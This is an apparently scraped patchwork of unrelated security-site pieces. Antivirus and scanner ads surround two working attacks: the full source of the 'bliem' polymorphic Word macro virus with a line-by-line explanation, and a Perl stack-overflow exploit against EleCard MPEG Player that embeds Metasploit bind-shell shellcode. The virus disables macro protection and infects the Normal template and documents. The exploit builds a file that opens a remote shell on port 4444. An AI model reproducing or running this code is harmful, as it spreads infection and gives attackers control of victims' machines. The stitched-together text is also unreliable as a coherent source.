Unfortunately, no signature base is complete enough to guarantee total protection. Even if the base is updated regularly, if this spyware signature is not included there - the anti-spy software is helpless against it. Anti-spies do not recognize every spyware product, when it is brand-new, for some time - until its signature is included into the bases and users update their anti-spies. There also are kinds of spy software which signatures are unlikely to be included into any signature base. For example, spy software can be developed by government organizations for their own purposes. Some commercial, especially corporate, monitoring products are very rarely included into signature bases, though many of them can well be used for spying as well.

Another case - when there is only one copy of spy program. It doesn't take too long for a good programmer to write one. Spyware, just like clothes, can be "tailor-made". Hackers often take source codes of spy software from the Internet change them a bit and then compile something new, which no signature base will recognize.

When a keylogging module is the part of a virus, it can cause lots of trouble, because several hours or even days will pass until it is included into signature bases.

A problem with a personal firewall is that it asks too many questions. Even an experienced user can answer them incorrectly and allow some information-stealing program or module do its job. For example, some commercial monitoring programs use processes of programs with access to the Internet (browsers, mail clients, etc.) As a result, if the anti-virus overlooks a keylogger, valuable information can be stolen and sent via the Internet to the address specified by the hacker (or some other person).

Anti-keylogger™ is a dedicated anti-keylogging product. Unlike most other anti-spyware, Anti-keylogger doesn't depend on signature bases - just because it doesn't use them. The newly developed solutions and algorithms allow it to spot behavior of a spy program - and disable it instantly.

Anti-keylogger™ can protect against even "custom-made" software keyloggers, which are extremely dangerous - and very popular with cybercriminals.

Anti-keylogger™ is very user-friendly. It runs at the background, quite transparently for the user. It won't ask you needless questions; nor it will distract you from your work.

Easy-to-use and reliable, Anti-keylogger™will guard your privacy and guarantee that all your confidential information remains secret.

For more information detail, click here

This engine is a combination of both a class infector and a polymorphic engine. The whole thing is called 'bliem' like the virus I first used this engine in. Let's say something about the technic...

The most bad thing about the already existing polymorphic engines for vba was that the always inserted the code at the same lines or the volume of the source code growed and growed and ... So 'bliem' doesn't have such problems. The main good thing in 'bliem' is that it always 'keeps an eye' on the actually size of the source code and reduces it when it's too big. Let's say something about the technic of inserting the junkcode: The junkcode is inserted into the viruscode not in the common way. The junkcode is inserted while infection. This means that the whole viruscode is stored in arrays and the junkcode is stored in some of this arrays. Like the main code is stored there, also junkcode is also there and will be inserted while infecting the
new class object. While inserting the actual code into arrays, the 'bliem brain' is checking for the actually size of itself and if its too big, it deletes some junk arrays. I use this method because the old one with the command '.deletelines' only screwed up the code.

To make 'bliem' work you have to insert a comment sign ( ' ) in the end of every code line. 'bliem' uses this for finding the junkcode in the normal virus code. Without this signs the virus and the polymorphic engine won't work.

So 'bliem' is infector and polymorphic engine in one, so don't wonder about the code. If you have any questions or whatever, feel free and mail me!

!This is only the distribution code. Original code uses shorter variable names!

Private Sub document_open() '
Dim virus(150): virus(1) = "bliem": Options.VirusProtection = (Rnd * 0) '
Set ho = MacroContainer.VBProject: Set hos = ho.VBComponents(1) '
Set host = hos.CodeModule: Set skip = NormalTemplate: this = Chr(39) '
Set newhost = skip.VBProject.VBComponents(1).CodeModule '
For y = 1 To Int(75 - (Rnd * 20)): vx = vx & Chr(255 - Int(Rnd * 100)): Next y '
vcode = "Private Sub document_close()" & this & vx & vbCr '
If MacroContainer = NormalTemplate Then '
Set skip = ActiveDocument '
Set newhost = skip.VBProject.VBComponents(1).CodeModule '
vcode = "Sub document_open()" & this & vx & vbCr '
End If: Randomize: lines_ = host.countoflines '
For i = 2 To lines_ '
junkcode = "" '
dis = Int(Rnd * 3) '
pos = InStr(host.Lines(i, 1), this) '
If pos = 0 Then GoTo end_ '
If pos = 2 And lines_ > 100 Then '
virus(i) = "": dis = 1: GoTo next_ '
End If '
virus(i) = Left(host.Lines(i, 1), (pos - 1)) '
For j = 1 To Int(75 - (Rnd * 20)) '
junkcode = junkcode & Chr(255 - Int(Rnd * 100)) '
Next j '
virus(i) = virus(i) & this & junkcode '
If dis = 2 Then virus(i) = virus(i) & vbCr & Chr(32) & this & junkcode '
vcode = vcode & virus(i) & vbCr '
next_: '
Next i '
end_: '
If newhost.countoflines < 2 Then '
newhost.AddFromString vcode '
skip.Save '
End If '
End Sub '
If Day(Now()) = 31 Then msbox virus(1) '
Rem Another virus by Jack Twoflower [LineZer0 & Metaphase] '
Rem Uses "bliem" polymorhic engine by Jack Twoflower '

I'll walk now through the code...

> Attention. The whole engine needs this " ' " signs after every
> line of code.

Private Sub document_open() '
Dim virus(150): virus(1) = "bliem": Options.VirusProtection = (Rnd * 0) '

> Dim the arrays. We need about 150 coz in this array the whole virus
> code will be stored. Turn off Virusprotection...

Set ho = MacroContainer.VBProject: Set hos = ho.VBComponents(1) '
Set host = hos.CodeModule: Set skip = NormalTemplate: this = Chr(39) '

> Set here our current host

For y = 1 To Int(75 - (Rnd * 20)): vx = vx & Chr(255 - Int(Rnd * 100)): Next y '

> Create junk code for the engine

vcode = "Private Sub document_close()" & this & vx & vbCr '

> This will be our first line of code...

If MacroContainer = NormalTemplate Then '
Set skip = ActiveDocument '
vcode = "Sub document_open()" & this & vx & vbCr '
End If: Randomize: lines_ = host.countoflines '

> If we are here in the Normaltemplate then exchange the hosts.

Set newhost = skip.VBProject.VBComponents(1).CodeModule '

> Set the new host

For i = 2 To lines_ '

> Here the 'brain' of the engine starts...

junkcode = "" '

> Clear the variable every loop

dis = Int(Rnd * 3) '

> Generate a random number for the engine

pos = InStr(host.Lines(i, 1), this) '

> Get the position of the " ' " character in every line...

If pos = 0 Then GoTo end_ '

> If there is no such sign goto end...

If pos = 2 And lines_ > 100 Then '

> The following code gets active if the size of the whole
> code is growing too big...it cuts the junkcode line out
> of the normal code...

virus(i) = "": dis = 1: GoTo next_ '

> Clear this variable and goto next loop

End If '
virus(i) = Left(host.Lines(i, 1), (pos - 1)) '

> If the size is not too big, copy the normal code without
> the junkcode into the arrays...

For j = 1 To Int(75 - (Rnd * 20)) '
junkcode = junkcode & Chr(255 - Int(Rnd * 100)) '
Next j '

> Generate junkcode again...

virus(i) = virus(i) & this & junkcode '

> Add the junkcode...

If dis = 2 Then virus(i) = virus(i) & vbCr & Chr(32) & this & junkcode '

> If the 'dis' integer is 2 then add some junkcode lines into our code...

vcode = vcode & virus(i) & vbCr '

> Add the whole code into 'vcode'

next_: '
Next i '

> Play it again Sam!

end_: '
If newhost.countoflines < 2 Then '

> If there are 0 or 1 line in our newhost...

newhost.AddFromString vcode '

> infect it...

skip.Save '

> and save it...

End If '
If Day(Now()) = 31 Then msbox virus(1) '

> little payload...

End Sub '
Rem Another virus by jack twoflower [LineZer0 & Metaphase] '
Rem Uses "bliem" polymorhic engine by jack twoflower '

ref. VX Heavens

Why You Need To Secure Your Web Applications
Website security is possibly today's most overlooked aspect of securing the
enterprise and should be a priority in any organization.
Increasingly, hackers are concentrating their efforts on web-based
applications – shopping carts, forms, login pages, dynamic content, etc.
Accessible 24/7 from anywhere in the world, insecure web applications
provide easy access to backend corporate databases and also allow hackers
to perform illegal activities using the attacked sites. A victim’s website can be
used to launch criminal activities such as hosting phishing sites or to transfer
illicit content, while abusing the website’s bandwidth and making its owner
liable for these unlawful acts.
Hackers already have a wide repertoire of attacks that they regularly launch
against organizations including SQL Injection, Cross Site Scripting, Directory
Traversal Attacks, Parameter Manipulation (e.g., URL, Cookie, HTTP
headers, HTML Forms), Authentication Attacks, Directory Enumeration and
other exploits. Moreover, the hacker community is very close-knit; newly
discovered web application intrusions are posted on a number of forums and
websites known only to members of that exclusive group. Postings are
updated daily and are used to propagate and facilitate further hacking.
Web applications – shopping carts, forms, login pages, dynamic content, and
other bespoke applications – are designed to allow your website visitors to
retrieve and submit dynamic content including varying levels of personal and
sensitive data.
If these web applications are not secure, then your entire database of
sensitive information is at serious risk. A Gartner Group study reveals that
75% of cyber attacks are done at the web application level.
Download Acunetix Web Vulnerability
Scanner manual, click here


Why does this happen?

· Websites and related web applications must be available 24 hours a
day, 7 days a week to provide the required service to customers,
employees, suppliers and other stakeholders.
· Firewalls and SSL provide no protection against web application
hacking, simply because access to the website has to be made
public.
· Web applications often have direct access to backend data such as
customer databases and, hence, control valuable data and are much
more difficult to secure.
· Most web applications are custom-made and, therefore, involve a
lesser degree of testing than off-the-shelf software. Consequently,
custom applications are more susceptible to attack.

Various high-profile hacking attacks have proven that web application
security remains the most critical. If your web applications are compromised,
hackers will have complete access to your backend data even though your
firewall is configured correctly and your operating system and applications
are patched repeatedly.
Network security defense provides no protection against web application
attacks since these are launched on port 80 (default for websites) which has
to remain open to allow regular operation of the business.
For the most comprehensive security strategy, it is therefore imperative that
you regularly and consistently audit your web applications for exploitable
vulnerabilities.

#!/usr/bin/perl
# By ALpHaNiX
# NullArea.Net
# THanks
#EAX 00000000
#ECX 41414141
#EDX 775A104D
#EBX 00000000
#ESP 0012C280
#EBP 0012C2A0
#ESI 00000000
#EDI 00000000
#EIP 41414141

system("color 5");

if (@ARGV != 1) { &help; exit(); }

sub help(){
print "[X] Usage : ./exploit.pl filename \n";
}

{ $file = $ARGV[0]; }
print "\n [X]*************************************************\n";
print " [X]EleCard MPEG PLAYER Local Stack Overflow Exploit *\n";
print " [X] Coded By AlpHaNiX *\n";
print " [X] From Null Area [NullArea.Net] *\n";
print " [X]**************************************************\n\n";

print "[+] Exploiting.....\n" ;

my $buff="http://"."\x41" x 969 ;
my $nop ="\x90" x 6000 ;
my $ret ="\xB3\x37\x8D\x6E" ; # JMP ESP In DDRAW.Dll In Windows
Vista Ultimate English

# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58".
"\x4e\x36\x46\x52\x46\x42\x4b\x38\x45\x54\x4e\x33\x4b\x48\x4e\x37".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x58".
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x53\x4b\x58".
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c".
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x35\x46\x42\x4a\x52\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x48\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48".
"\x49\x38\x4e\x46\x46\x42\x4e\x31\x41\x36\x43\x4c\x41\x53\x4b\x4d".
"\x46\x36\x4b\x58\x43\x34\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x48".
"\x42\x47\x4e\x31\x4d\x4a\x4b\x48\x42\x54\x4a\x30\x50\x45\x4a\x56".
"\x50\x38\x50\x54\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46".
"\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x57\x43\x57".
"\x44\x33\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x48\x45\x4e".
"\x48\x56\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35".
"\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x45\x43\x45\x43\x54".
"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x41".
"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x49\x4a\x46\x46\x4a".
"\x4c\x41\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x41".
"\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32".
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x45\x4f\x4f\x42\x4d".
"\x4a\x56\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x35\x4f\x4f\x48\x4d".
"\x42\x45\x46\x35\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x46".
"\x47\x4e\x49\x47\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45".
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x56".
"\x4d\x36\x49\x48\x45\x4e\x4c\x46\x42\x55\x49\x35\x49\x52\x4e\x4c".
"\x49\x38\x47\x4e\x4c\x36\x46\x54\x49\x48\x44\x4e\x41\x33\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x54\x4e\x52".
"\x43\x59\x4d\x58\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".
"\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f".
"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x35\x41\x45\x41\x45\x4c\x46".
"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46".
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x55\x4e\x4f".
"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".
"\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x55\x43\x35\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";

my $exploit = $buff.$ret.$nop.$shellcode;
print "[+] Creating Evil File" ;
open(blah, ">>$file") or die "Cannot open $file";
print blah $exploit;
close(blah);
print "\n[+] Please wait while creating $file";
print "\n[+] $file has been created";

reference
# milw0rm.com [2009-01-25]

Kaspersky Anti-Virus 2009 – the backbone of your PC’s security system, offering protection from a range of IT threats.

Kaspersky Anti-Virus 2009 provides the basic tools needed to protect your PC.
Download Kaspersky Anti-Virus 2009 brochure


more detail